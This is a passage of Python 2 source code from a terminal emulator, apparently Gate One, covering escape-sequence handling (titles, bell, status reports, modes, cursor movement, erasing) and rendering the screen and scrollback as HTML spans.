import time self.quitting = False while not self.quitting: if self.captured_files: self.close_captured_fds() time.sleep(5) else: self.quitting = True logging.debug('_captured_fd_watcher() quitting: No more images.') def close_captured_fds(self): """ Closes the file descriptors of any captured files that are no longer on the screen. """ #logging.debug('close_captured_fds()') # Commented because it's kinda noisy if self.captured_files: for ref in list(self.captured_files.keys()): found = False for line in self.screen: if ref in line: found = True break if self.alt_screen: for line in self.alt_screen: if ref in line: found = True break if not found: try: self.captured_files[ref].close() except AttributeError: pass # File already closed or never captured properly del self.captured_files[ref] def _string_terminator(self): """ Handle the string terminator (ST). .. note:: Doesn't actually do anything at the moment. Probably not needed since :meth:`Terminal._escape` and/or :meth:`Terminal.bell` will end up handling any sort of sequence that would end in an ST anyway. """ # NOTE: Might this just call _cancel_esc_sequence? I need to double-check. pass def _osc_handler(self): """ Handles Operating System Command (OSC) escape sequences which need special care since they are of indeterminiate length and end with either a bell (\\\\x07) or a sequence terminator (\\\\x9c aka ST). This will usually be called from :meth:`Terminal.bell` to set the title of the terminal (just like an xterm) but it is also possible to be called directly whenever an ST is encountered. 
""" # Try the title sequence first match_obj = self.RE_TITLE_SEQ.match(self.esc_buffer) if match_obj: self.esc_buffer = '' title = match_obj.group(1) self.set_title(title) # Sets self.title return # Next try our special optional handler sequence match_obj = self.RE_OPT_SEQ.match(self.esc_buffer) if match_obj: self.esc_buffer = '' text = match_obj.group(1) self._opt_handler(text) return # At this point we've encountered something unusual logging.warning(_("Warning: No special ESC sequence handler for %s" % repr(self.esc_buffer))) self.esc_buffer = '' def bell(self): """ Handles the bell character and executes :meth:`Terminal.callbacks[CALLBACK_BELL]` (if we are not in the middle of an escape sequence that ends with a bell character =). If we *are* in the middle of an escape sequence, calls :meth:`self._osc_handler` since we can be nearly certain that we're simply terminating an OSC sequence. Isn't terminal emulation grand? ⨀_⨀ """ # NOTE: A little explanation is in order: The bell character (\x07) by # itself should play a bell (pretty straighforward). However, if # the bell character is at the tail end of a particular escape # sequence (string starting with \x1b]0;) this indicates an xterm # title (everything between \x1b]0;...\x07). if not self.esc_buffer: # We're not in the middle of an esc sequence logging.debug('Regular bell') try: for callback in self.callbacks[CALLBACK_BELL].values(): callback() except TypeError: pass else: # We're (likely) setting a title self.esc_buffer += '\x07' # Add the bell char so we don't lose it self._osc_handler() def _device_status_report(self, n=None): """ Returns '\\\\x1b[0n' (terminal OK) and executes: .. code-block:: python self.callbacks[CALLBACK_DSR]("\\x1b[0n") """ logging.debug("_device_status_report()") response = u"\x1b[0n" try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(response) except TypeError: pass return response def _csi_device_identification(self, request=None): """ If we're responding to ^[Z, ^[c, or ^[0c, returns '\\\\x1b[1;2c' (Meaning: I'm a vt220 terminal, version 1.0) and executes: .. code-block:: python self.callbacks[self.CALLBACK_DSR]("\\x1b[1;2c") If we're responding to ^[>c or ^[>0c, executes: .. code-block:: python self.callbacks[self.CALLBACK_DSR]("\\x1b[>0;271;0c") """ logging.debug("_csi_device_identification(%s)" % request) if request and u">" in request: response = u"\x1b[>0;271;0c" else: response = u"\x1b[?1;2c" try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(response) except TypeError: pass return response def _csi_device_status_report(self, request=None): """ Calls :meth:`self.callbacks[self.CALLBACK_DSR]` with an appropriate response to the given *request*. .. code-block:: python self.callbacks[self.CALLBACK_DSR](response) Supported requests and their responses: ============================= ================== Request Response ============================= ================== ^[5n (Status Report) ^[[0n ^[6n (Report Cursor Position) ^[[<row>;<column>R ^[15n (Printer Ready?) 
            ^[[10n (Ready)
        =============================  ==================
        """
        logging.debug("_csi_device_status_report(%s)" % request)
        supported_requests = [
            u"5",
            u"6",
            u"15",
        ]
        if not request:
            return # Nothing to do
        response = u""
        if request.startswith('?'): # Get rid of it
            request = request[1:]
        if request in supported_requests:
            if request == u"5":
                response = u"\x1b[0n"
            elif request == u"6":
                rows = self.cursorY + 1
                cols = self.cursorX + 1
                response = u"\x1b[%s;%sR" % (rows, cols)
            elif request == u"15":
                response = u"\x1b[10n"
            try:
                for callback in self.callbacks[CALLBACK_DSR].values():
                    callback(response)
            except TypeError:
                pass
        return response

    def set_expanded_mode(self, setting):
        """
        Accepts "standard mode" settings.  Typically '\\x1b[?25h' to show the
        cursor.

        Notes on modes::

            '?1h' - Application Cursor Keys
            '?5h' - DECSCNM (default off): Set reverse-video mode
            '?7h' - DECAWM: Autowrap mode
            '?12h' - Local echo (SRM or Send Receive Mode)
            '?25h' - Show cursor
            '?1000h' - Send Mouse X/Y on button press and release
            '?1001h' - Use Hilite Mouse Tracking
            '?1002h' - Use Cell Motion Mouse Tracking
            '?1003h' - Use All Motion Mouse Tracking
            '?1004h' - Send focus in/focus out events
            '?1005h' - Enable UTF-8 Mouse Mode
            '?1006h' - Enable SGR Mouse Mode
            '?1015h' - Enable urxvt Mouse Mode
            '?1049h' - Save cursor and screen
        """
        # TODO: Add support for the following:
        # * 3: 132 column mode (might be "or greater")
        # * 4: Smooth scroll (for animations and also makes things less choppy)
        # * 5: Reverse video (should be easy: just need some extra CSS)
        # * 6: Origin mode
        # * 7: Wraparound mode
        logging.debug("set_expanded_mode(%s)" % setting)
        if setting.startswith('?'): # DEC Private Mode Set
            setting = setting[1:] # Don't need the ?
            settings = setting.split(';')
            for setting in settings:
                try:
                    self.expanded_mode_handlers[setting](True)
                except (KeyError, TypeError):
                    pass # Unsupported expanded mode
                try:
                    for callback in self.callbacks[CALLBACK_MODE].values():
                        callback(setting, True)
                except TypeError:
                    pass
        else:
            # There are a couple of mode settings that are just "[Nh" where
            # N == number:
            #   [2h   Keyboard Action Mode (AM)
            #   [4h   Insert Mode
            #   [12h  Send/Receive Mode (SRM)
            #   [24h  Automatic Newline (LNM)
            if setting == '4':
                self.insert_mode = True

    def reset_expanded_mode(self, setting):
        """
        Accepts "standard mode" settings.  Typically '\\x1b[?25l' to hide the
        cursor.
        """
        logging.debug("reset_expanded_mode(%s)" % setting)
        if setting.startswith('?'):
            setting = setting[1:] # Don't need the ?
            settings = setting.split(';')
            for setting in settings:
                try:
                    self.expanded_mode_handlers[setting](False)
                except (KeyError, TypeError):
                    pass # Unsupported expanded mode
                try:
                    for callback in self.callbacks[CALLBACK_MODE].values():
                        callback(setting, False)
                except TypeError:
                    pass
        else:
            # There are a couple of mode settings that are just "[Nh" where
            # N == number:
            #   [2h   Keyboard Action Mode (AM)
            #   [4h   Insert Mode
            #   [12h  Send/Receive Mode (SRM)
            #   [24h  Automatic Newline (LNM)
            # The only one we care about is 4 (insert mode)
            if setting == '4':
                self.insert_mode = False

    def toggle_alternate_screen_buffer(self, alt):
        """
        If *alt* is True, copy the current screen and renditions to
        :attr:`self.alt_screen` and :attr:`self.alt_renditions` then re-init
        :attr:`self.screen` and :attr:`self.renditions`.

        If *alt* is False, restore the saved screen buffer and renditions
        then nullify :attr:`self.alt_screen` and :attr:`self.alt_renditions`.
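
        A sketch of the round trip (this is what full-screen programs like
        'top' trigger, e.g. via mode 1049, "save cursor and screen")::

            >>> term.toggle_alternate_screen_buffer(True)  # Save and clear
            >>> term.toggle_alternate_screen_buffer(False) # Restore original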
""" #logging.debug('toggle_alternate_screen_buffer(%s)' % alt) if alt: # Save the existing screen and renditions self.alt_screen = self.screen[:] self.alt_renditions = self.renditions[:] # Make a fresh one self.clear_screen() else: # Restore the screen if self.alt_screen and self.alt_renditions: self.screen = self.alt_screen[:] self.renditions = self.alt_renditions[:] # Empty out the alternate buffer (to save memory) self.alt_screen = None self.alt_renditions = None # These all need to be reset no matter what self.cur_rendition = unichr(1000) def toggle_alternate_screen_buffer_cursor(self, alt): """ Same as :meth:`Terminal.toggle_alternate_screen_buffer` but also saves/restores the cursor location. """ #logging.debug('toggle_alternate_screen_buffer_cursor(%s)' % alt) if alt: self.alt_cursorX = self.cursorX self.alt_cursorY = self.cursorY else: self.cursorX = self.alt_cursorX self.cursorY = self.alt_cursorY self.toggle_alternate_screen_buffer(alt) def expanded_mode_toggle(self, mode, boolean): """ Meant to be used with (simple) expanded mode settings that merely set or reset attributes for tracking purposes; sets `self.expanded_modes[mode]` to *boolean*. Example usage:: >>> self.expanded_mode_handlers['1000'] = partial(self.expanded_mode_toggle, 'mouse_button_events') """ self.expanded_modes[mode] = boolean def insert_characters(self, n=1): """ Inserts the specified number of characters at the cursor position. Overwriting whatever is already present. """ #logging.debug("insert_characters(%s)" % n) n = int(n) for i in xrange(n): self.screen[self.cursorY].pop() # Take one down, pass it around self.screen[self.cursorY].insert(self.cursorX, u' ') def delete_characters(self, n=1): """ DCH - Deletes (to the left) the specified number of characters at the cursor position. As characters are deleted, the remaining characters between the cursor and right margin move to the left. Character attributes (renditions) move with the characters. The terminal adds blank spaces with no visual character attributes at the right margin. DCH has no effect outside the scrolling margins. .. note:: Deletes renditions too. You'd *think* that would be in one of the VT-* manuals... Nope! """ #logging.debug("delete_characters(%s)" % n) if not n: # e.g. n == '' n = 1 else: n = int(n) for i in xrange(n): try: self.screen[self.cursorY].pop(self.cursorX) self.screen[self.cursorY].append(u' ') self.renditions[self.cursorY].pop(self.cursorX) self.renditions[self.cursorY].append(unichr(1000)) except IndexError: # At edge of screen, ignore #print('IndexError in delete_characters(): %s' % e) pass def _erase_characters(self, n=1): """ Erases (to the right) the specified number of characters at the cursor position. .. note:: Deletes renditions too. """ #logging.debug("_erase_characters(%s)" % n) if not n: # e.g. 
n == '' n = 1 else: n = int(n) distance = self.cols - self.cursorX n = min(n, distance) for i in xrange(n): self.screen[self.cursorY][self.cursorX+i] = u' ' self.renditions[self.cursorY][self.cursorX+i] = unichr(1000) def cursor_left(self, n=1): """ESCnD CUB (Cursor Back)""" # Commented out to save CPU (and the others below too) #logging.debug('cursor_left(%s)' % n) n = int(n) # This logic takes care of double-width unicode characters if self.double_width_left: self.double_width_left = False return self.cursorX = max(0, self.cursorX - n) # Ensures positive value try: char = self.screen[self.cursorY][self.cursorX] except IndexError: # Cursor is past the right-edge of the screen; ignore char = u' ' # This is a safe default/fallback if unicodedata.east_asian_width(char) == 'W': # This lets us skip the next call (get called 2x for 2x width) self.double_width_left = True try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_right(self, n=1): """ESCnC CUF (Cursor Forward)""" #logging.debug('cursor_right(%s)' % n) if not n: n = 1 n = int(n) # This logic takes care of double-width unicode characters if self.double_width_right: self.double_width_right = False return self.cursorX += n try: char = self.screen[self.cursorY][self.cursorX] except IndexError: # Cursor is past the right-edge of the screen; ignore char = u' ' # This is a safe default/fallback if unicodedata.east_asian_width(char) == 'W': # This lets us skip the next call (get called 2x for 2x width) self.double_width_right = True try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_up(self, n=1): """ESCnA CUU (Cursor Up)""" #logging.debug('cursor_up(%s)' % n) if not n: n = 1 n = int(n) self.cursorY = max(0, self.cursorY - n) try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_down(self, n=1): """ESCnB CUD (Cursor Down)""" #logging.debug('cursor_down(%s)' % n) if not n: n = 1 n = int(n) self.cursorY = min(self.rows, self.cursorY + n) try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_next_line(self, n): """ESCnE CNL (Cursor Next Line)""" #logging.debug("cursor_next_line(%s)" % n) if not n: n = 1 n = int(n) self.cursorY = min(self.rows, self.cursorY + n) self.cursorX = 0 try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_previous_line(self, n): """ESCnF CPL (Cursor Previous Line)""" #logging.debug("cursor_previous_line(%s)" % n) if not n: n = 1 n = int(n) self.cursorY = max(0, self.cursorY - n) self.cursorX = 0 try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_horizontal_absolute(self, n): """ESCnG CHA (Cursor Horizontal Absolute)""" if not n: n = 1 n = int(n) self.cursorX = n - 1 # -1 because cols is 0-based try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_position(self, coordinates): """ ESCnH CUP (Cursor Position). Move the cursor to the given coordinates. :coordinates: Should be something like, 'row;col' (1-based) but, 'row', 'row;', and ';col' are also valid (assumes 1 on missing value). .. note:: If coordinates is '' (an empty string), the cursor will be moved to the top left (1;1). """ # NOTE: Since this is 1-based we have to subtract 1 from everything to # match how we store these values internally. 
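        # For example (a sketch): coordinates == '12;40' should put the cursor
        # at self.cursorY == 11, self.cursorX == 39 (barring the double-width
        # character adjustment performed below).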
        if not coordinates:
            row, col = 0, 0
        elif ';' in coordinates:
            row, col = coordinates.split(';')
        else:
            row = coordinates
            col = 0
        try:
            row = int(row)
        except ValueError:
            row = 0
        try:
            col = int(col)
        except ValueError:
            col = 0
        # These ensure a positive integer while reducing row and col by 1:
        row = max(0, row - 1)
        col = max(0, col - 1)
        self.cursorY = row
        # The column needs special attention in case there's double-width
        # characters.
        double_width = 0
        if self.cursorY < self.rows:
            for i, char in enumerate(self.screen[self.cursorY]):
                if i == col - double_width:
                    # No need to continue further
                    break
                if unicodedata.east_asian_width(char) == 'W':
                    double_width += 1
            if double_width:
                col = col - double_width
        self.cursorX = col
        try:
            for callback in self.callbacks[CALLBACK_CURSOR_POS].values():
                callback()
        except TypeError:
            pass

    def cursor_position_vertical(self, n):
        """
        Vertical Line Position Absolute (VPA) - Moves the cursor to given
        line.
        """
        n = int(n)
        self.cursorY = n - 1

    def clear_screen(self):
        """
        Clears the screen.  Also used to emulate a terminal reset.

        .. note::

            The current rendition (self.cur_rendition) will be applied to all
            characters on the screen when this function is called.
        """
        logging.debug('clear_screen()')
        self.scroll_up(len(self.screen) - 1)
        self.init_screen()
        self.init_renditions(self.cur_rendition)
        self.cursorX = 0
        self.cursorY = 0

    def clear_screen_from_cursor_down(self):
        """
        Clears the screen from the cursor down (ESC[J or ESC[0J).

        .. note::

            This method actually erases from the cursor position to the end
            of the screen.
        """
        #logging.debug('clear_screen_from_cursor_down()')
        self.clear_line_from_cursor_right()
        if self.cursorY == self.rows - 1:
            # Bottom of screen; nothing to do
            return
        self.screen[self.cursorY+1:] = [
            array('u', u' ' * self.cols)
                for a in self.screen[self.cursorY+1:]
        ]
        c = self.cur_rendition # Just to save space below
        self.renditions[self.cursorY+1:] = [
            array('u', c * self.cols)
                for a in self.renditions[self.cursorY+1:]
        ]

    def clear_screen_from_cursor_up(self):
        """
        Clears the screen from the cursor up (ESC[1J).
        """
        #logging.debug('clear_screen_from_cursor_up()')
        self.screen[:self.cursorY+1] = [
            array('u', u' ' * self.cols)
                for a in self.screen[:self.cursorY+1]
        ]
        c = self.cur_rendition
        self.renditions[:self.cursorY+1] = [
            array('u', c * self.cols)
                for a in self.renditions[:self.cursorY+1]
        ]
        self.cursorY = 0

    def clear_screen_from_cursor(self, n):
        """
        CSI *n* J ED (Erase Data).  This escape sequence uses the following
        rules:

            ======  =============================  ===
            Esc[J   Clear screen from cursor down  ED0
            Esc[0J  Clear screen from cursor down  ED0
            Esc[1J  Clear screen from cursor up    ED1
            Esc[2J  Clear entire screen            ED2
            ======  =============================  ===
        """
        #logging.debug('clear_screen_from_cursor(%s)' % n)
        try:
            n = int(n)
        except ValueError: # Esc[J
            n = 0
        clear_types = {
            0: self.clear_screen_from_cursor_down,
            1: self.clear_screen_from_cursor_up,
            2: self.clear_screen
        }
        try:
            clear_types[n]()
        except KeyError:
            logging.error(_("Error: Unsupported number for escape sequence J"))
        # Execute our callbacks
        try:
            for callback in self.callbacks[CALLBACK_CHANGED].values():
                callback()
        except TypeError:
            pass
        try:
            for callback in self.callbacks[CALLBACK_CURSOR_POS].values():
                callback()
        except TypeError:
            pass

    def clear_line_from_cursor_right(self):
        """
        Clears the line from the cursor right (ESC[K or ESC[0K).
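
        A sketch: with u'foobar' at the start of the current line and the
        cursor on the third character, the line becomes u'fo' padded out with
        spaces (the renditions from the cursor onward are reset too).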
""" #logging.debug("clear_line_from_cursor_right()") saved = self.screen[self.cursorY][:self.cursorX] saved_renditions = self.renditions[self.cursorY][:self.cursorX] spaces = array('u', u' '*len(self.screen[self.cursorY][self.cursorX:])) renditions = array('u', self.cur_rendition * len(self.screen[self.cursorY][self.cursorX:])) self.screen[self.cursorY] = saved + spaces # Reset the cursor position's rendition to the end of the line self.renditions[self.cursorY] = saved_renditions + renditions def clear_line_from_cursor_left(self): """ Clears the screen from the cursor left (ESC[1K). """ #logging.debug("clear_line_from_cursor_left()") saved = self.screen[self.cursorY][self.cursorX:] saved_renditions = self.renditions[self.cursorY][self.cursorX:] spaces = array('u', u' '*len(self.screen[self.cursorY][:self.cursorX])) renditions = array('u', self.cur_rendition * len(self.screen[self.cursorY][:self.cursorX])) self.screen[self.cursorY] = spaces + saved self.renditions[self.cursorY] = renditions + saved_renditions def clear_line(self): """ Clears the entire line (ESC[2K). """ #logging.debug("clear_line()") self.screen[self.cursorY] = array('u', u' ' * self.cols) c = self.cur_rendition self.renditions[self.cursorY] = array('u', c * self.cols) self.cursorX = 0 def clear_line_from_cursor(self, n): """ CSI*n*K EL (Erase in Line). This escape sequence uses the following rules: ====== ============================== === Esc[K Clear screen from cursor right EL0 Esc[0K Clear screen from cursor right EL0 Esc[1K Clear screen from cursor left EL1 Esc[2K Clear entire line ED2 ====== ============================== === """ #logging.debug('clear_line_from_cursor(%s)' % n) try: n = int(n) except ValueError: # Esc[J n = 0 clear_types = { 0: self.clear_line_from_cursor_right, 1: self.clear_line_from_cursor_left, 2: self.clear_line } try: clear_types[n]() except KeyError: logging.error(_( "Error: Unsupported number for CSI escape sequence K")) # Execute our callbacks try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def set_led_state(self, n): """ Sets the values the dict, self.leds depending on *n* using the following rules: ====== ====================== ====== Esc[0q Turn off all four leds DECLL0 Esc[1q Turn on LED #1 DECLL1 Esc[2q Turn on LED #2 DECLL2 Esc[3q Turn on LED #3 DECLL3 Esc[4q Turn on LED #4 DECLL4 ====== ====================== ====== .. note:: These aren't implemented in Gate One's GUI (yet) but they certainly kept track of! """ logging.debug("set_led_state(%s)" % n) leds = n.split(';') for led in leds: led = int(led) if led == 0: self.leds[1] = False self.leds[2] = False self.leds[3] = False self.leds[4] = False else: self.leds[led] = True try: for callback in self.callbacks[CALLBACK_LEDS].values(): callback(led) except TypeError: pass def _set_rendition(self, n): """ Sets :attr:`self.renditions[self.cursorY][self.cursorX]` equal to *n.split(';')*. *n* is expected to be a string of ECMA-48 rendition numbers separated by semicolons. Example:: '0;1;31' ...will result in:: [0, 1, 31] Note that the numbers were converted to integers and the order was preserved. 
""" #logging.debug("_set_rendition(%s)" % n) cursorY = self.cursorY cursorX = self.cursorX if cursorX >= self.cols: # We're at the end of the row try: if len(self.renditions[cursorY]) <= cursorX: # Make it all longer self.renditions[cursorY].append(u' ') # Make it longer self.screen[cursorY].append(u'\x00') # This needs to match except IndexError: # This can happen if the rate limiter kicks in and starts # cutting off escape sequences at random. return # Don't bother attempting to process anything else if cursorY >= self.rows: logging.error(_( "cursorY >= self.rows! This is either a bug or just a symptom " "of the rate limiter kicking in.")) return # Don't bother setting renditions past the bottom if not n: # or \x1b[m (reset) # First char in PUA Plane 16 is always the default: self.cur_rendition = unichr(1000) # Should be reset (e.g. [0]) return # No need for further processing; save some CPU # Convert the string (e.g. '0;1;32') to a list (e.g. [0,1,32] new_renditions = [int(a) for a in n.split(';') if a != ''] # Handle 256-color renditions by getting rid of the (38|48);5 part and # incrementing foregrounds by 1000 and backgrounds by 10000 so we can # tell them apart in _spanify_screen(). try: if 38 in new_renditions: foreground_index = new_renditions.index(38) if len(new_renditions[foreground_index:]) >= 2: if new_renditions[foreground_index+1] == 5: # This is a valid 256-color rendition (38;5;<num>) new_renditions.pop(foreground_index) # Goodbye 38 new_renditions.pop(foreground_index) # Goodbye 5 new_renditions[foreground_index] += 1000 if 48 in new_renditions: background_index = new_renditions.index(48) if len(new_renditions[background_index:]) >= 2: if new_renditions[background_index+1] == 5: # This is a valid 256-color rendition (48;5;<num>) new_renditions.pop(background_index) # Goodbye 48 new_renditions.pop(background_index) # Goodbye 5 new_renditions[background_index] += 10000 except IndexError: # Likely that the rate limiter has caused all sorts of havoc with # escape sequences. Just ignore it and halt further processing return out_renditions = [] for rend in new_renditions: if rend == 0: out_renditions = [0] else: out_renditions.append(rend) if out_renditions[0] == 0: # If it starts with 0 there's no need to combine it with the # previous rendition... reduced = _reduce_renditions(out_renditions) if reduced not in self.renditions_store.values(): new_ref_point = next(self.rend_counter) self.renditions_store.update({new_ref_point: reduced}) self.cur_rendition = new_ref_point else: # Find the right reference point to use for k, v in self.renditions_store.items(): if reduced == v: self.cur_rendition = k return new_renditions = out_renditions cur_rendition_list = self.renditions_store[self.cur_rendition] reduced = _reduce_renditions(cur_rendition_list + new_renditions) if reduced not in self.renditions_store.values(): new_ref_point = next(self.rend_counter) self.renditions_store.update({new_ref_point: reduced}) self.cur_rendition = new_ref_point else: # Find the right reference point to use for k, v in self.renditions_store.items(): if reduced == v: self.cur_rendition = k def _opt_handler(self, chars): """ Optional special escape sequence handler for sequences matching RE_OPT_SEQ. If CALLBACK_OPT is defined it will be called like so:: self.callbacks[CALLBACK_OPT](chars) Applications can use this escape sequence to define whatever special handlers they like. 
It works like this: If an escape sequence is encountered matching RE_OPT_SEQ this method will be called with the inbetween *chars* (e.g. \x1b]_;<chars>\x07) as the argument. Applications can then do what they wish with *chars*. .. note:: I added this functionality so that plugin authors would have a mechanism to communicate with terminal applications. See the SSH plugin for an example of how this can be done (there's channels of communication amongst ssh_connect.py, ssh.js, and ssh.py). """ try: for callback in self.callbacks[CALLBACK_OPT].values(): callback(chars) except TypeError: # High likelyhood that nothing is defined. No biggie. pass # NOTE: This was something I was testing to simplify the code. It works # (mostly) but the performance was TERRIBLE. Still needs investigation... #def _classify_renditions(self): #""" #Returns ``self.renditions`` as a list of HTML classes for each position. #""" #return [[map(RENDITION_CLASSES.get, rend) for rend in map( #self.renditions_store.get, rendition)] #for rendition in self.renditions] #def _spanify_line(self, line, rendition, current_classes=None, cursor=False): #""" #Returns a string containing *line* with HTML spans applied representing #*renditions*. #""" #outline = "" #reset_classes = RESET_CLASSES # TODO #html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} #foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') #backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') #prev_rendition = None #if current_classes: #outline += '<span class="%s%s">' % ( #self.class_prefix, #(" %s" % self.class_prefix).join(current_classes)) #charcount = 0 #for char, rend in izip(line, rendition): #changed = True #if char in "&<>": ## Have to convert ampersands and lt/gt to HTML entities #char = html_entities[char] #if rend == prev_rendition: ## Shortcut... So we can skip all the logic below #changed = False #else: #prev_rendition = rend #if changed: #outline += "</span>" #current_classes = [a for a in rend if a and 'reset' not in a] ##if rend and rend[0] == 'reset': ##if len(current_classes) > 1: ##classes = ( ##" %s" % self.class_prefix).join(current_classes) ##else: #classes = (" %s" % self.class_prefix).join(current_classes) #if current_classes != ['reset']: #outline += '<span class="%s%s">' % ( #self.class_prefix, classes) #if cursor and charcount == cursor: #outline += '<span class="%scursor">%s</span>' % ( #self.class_prefix, char) #else: #outline += char #charcount += 1 #open_spans = outline.count('<span') #close_spans = outline.count('</span') #if open_spans != close_spans: #for i in xrange(open_spans - close_spans): #outline += '</span>' #return current_classes, outline #def _spanify_screen_test(self): #""" #Iterates over the lines in *screen* and *renditions*, applying HTML #markup (span tags) where appropriate and returns the result as a list of #lines. It also marks the cursor position via a <span> tag at the #appropriate location. #""" ##logging.debug("_spanify_screen()") #results = [] ## NOTE: Why these duplicates of self.* and globals? Local variable ## lookups are faster--especially in loops. 
#special = SPECIAL ##rendition_classes = RENDITION_CLASSES #html_cache = HTML_CACHE #has_cache = isinstance(html_cache, AutoExpireDict) #screen = self.screen #renditions = self.renditions #renditions_store = self.renditions_store #classified_renditions = self._classify_renditions() #cursorX = self.cursorX #cursorY = self.cursorY #show_cursor = self.expanded_modes['25'] ##spancount = 0 #current_classes = [] ##prev_rendition = None ##foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') ##backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') ##html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} #cursor_span = '<span class="%scursor">' % self.class_prefix #for linecount, line in enumerate(screen): #rendition = classified_renditions[linecount] #combined = (line + renditions[linecount]).tounicode() #if has_cache and combined in html_cache: ## Always re-render the line with the cursor (or just had it) #if cursor_span not in html_cache[combined]: ## Use the cache... #results.append(html_cache[combined]) #continue #if not len(line.tounicode().rstrip()) and linecount != cursorY: #results.append(line.tounicode()) #continue # Line is empty so we don't need to process renditions #if linecount == cursorY and show_cursor: #current_classes, outline = self._spanify_line( #line, rendition, #current_classes=current_classes, #cursor=cursorX) #else: #current_classes, outline = self._spanify_line( #line, rendition, #current_classes=current_classes, #cursor=False) #if outline: #results.append(outline) #if html_cache: #html_cache[combined] = outline #else: #results.append(None) # null is less memory than spaces ## NOTE: The client has been programmed to treat None (aka null in ## JavaScript) as blank lines. #return results def _spanify_screen(self): """ Iterates over the lines in *screen* and *renditions*, applying HTML markup (span tags) where appropriate and returns the result as a list of lines. It also marks the cursor position via a <span> tag at the appropriate location. """ #logging.debug("_spanify_screen()") results = [] # NOTE: Why these duplicates of self.* and globals? Local variable # lookups are faster--especially in loops. special = SPECIAL rendition_classes = RENDITION_CLASSES html_cache = HTML_CACHE has_cache = isinstance(html_cache, AutoExpireDict) screen = self.screen renditions = self.renditions renditions_store = self.renditions_store cursorX = self.cursorX cursorY = self.cursorY show_cursor = self.expanded_modes['25'] spancount = 0 current_classes = set() prev_rendition = None foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} cursor_span = '<span class="%scursor">' % self.class_prefix for linecount, line in enumerate(screen): rendition = renditions[linecount] line_chars = line.tounicode() combined = line_chars + rendition.tounicode() cursor_line = True if linecount == cursorY else False if not cursor_line and has_cache and combined in html_cache: # Always re-render the line with the cursor (or just had it) if cursor_span not in html_cache[combined]: # Use the cache... 
results.append(html_cache[combined]) continue if not len(line_chars.rstrip()) and not cursor_line: results.append(line_chars) continue # Line is empty so we don't need to process renditions outline = "" if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) charcount = 0 for char, rend in izip(line, rendition): rend = renditions_store[rend] # Get actual rendition if ord(char) >= special: # Special stuff =) # Obviously, not really a single character if char in self.captured_files: outline += self.captured_files[char].html() continue changed = True if char in "&<>": # Have to convert ampersands and lt/gt to HTML entities char = html_entities[char] if rend == prev_rendition: # Shortcut... So we can skip all the logic below changed = False else: prev_rendition = rend if changed and rend: classes = imap(rendition_classes.get, rend) for _class in classes: if _class and _class not in current_classes: # Something changed... Start a new span if spancount: outline += "</span>" spancount -= 1 if 'reset' in _class: if _class == 'reset': current_classes = set() if spancount: for i in xrange(spancount): outline += "</span>" spancount = 0 else: reset_class = _class.split('reset')[0] if reset_class == 'foreground': [current_classes.remove(a) for a in current_classes if a in foregrounds] elif reset_class == 'background': [current_classes.remove(a) for a in current_classes if a in backgrounds] elif reset_class in current_classes: current_classes.remove(reset_class) else: if _class in foregrounds: [current_classes.remove(a) for a in current_classes if a in foregrounds] elif _class in backgrounds: [current_classes.remove(a) for a in current_classes if a in backgrounds] current_classes.add(_class) if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) spancount += 1 if cursor_line and show_cursor and charcount == cursorX: outline += '<span class="%scursor">%s</span>' % ( self.class_prefix, char) else: outline += char charcount += 1 if outline: # Make sure all renditions terminate at the end of the line for whatever in xrange(spancount): outline += "</span>" results.append(outline) if has_cache: html_cache[combined] = outline else: results.append(None) # null is shorter than spaces # NOTE: The client has been programmed to treat None (aka null in # JavaScript) as blank lines. for whatever in xrange(spancount): # Bit of cleanup to be safe results[-1] += "</span>" return results def _spanify_scrollback(self): """ Spanifies (turns renditions into `<span>` elements) everything inside `self.scrollback` using `self.renditions`. This differs from `_spanify_screen` in that it doesn't apply any logic to detect the location of the cursor (to make it just a tiny bit faster). 
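
        .. note::

            Most scrollback lines will have already been rendered (and cached
            in HTML_CACHE) while they were still on the screen, so the loop
            below can usually skip straight to the cached HTML.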
""" # NOTE: See the comments in _spanify_screen() for details on this logic results = [] special = SPECIAL html_cache = HTML_CACHE has_cache = isinstance(html_cache, AutoExpireDict) screen = self.scrollback_buf renditions = self.scrollback_renditions rendition_classes = RENDITION_CLASSES renditions_store = self.renditions_store spancount = 0 current_classes = set() prev_rendition = None foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} cursor_span = '<span class="%scursor">' % self.class_prefix for line, rendition in izip(screen, renditions): combined = (line + rendition).tounicode() if has_cache and combined in html_cache: # Most lines should be in the cache because they were rendered # while they were on the screen. if cursor_span not in html_cache[combined]: results.append(html_cache[combined]) continue if not len(line.tounicode().rstrip()): results.append(line.tounicode()) continue # Line is empty so we don't need to process renditions outline = "" if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) for char, rend in izip(line, rendition): rend = renditions_store[rend] # Get actual rendition if ord(char) >= special: # Special stuff =) # Obviously, not really a single character if char in self.captured_files: outline += self.captured_files[char].html() continue changed 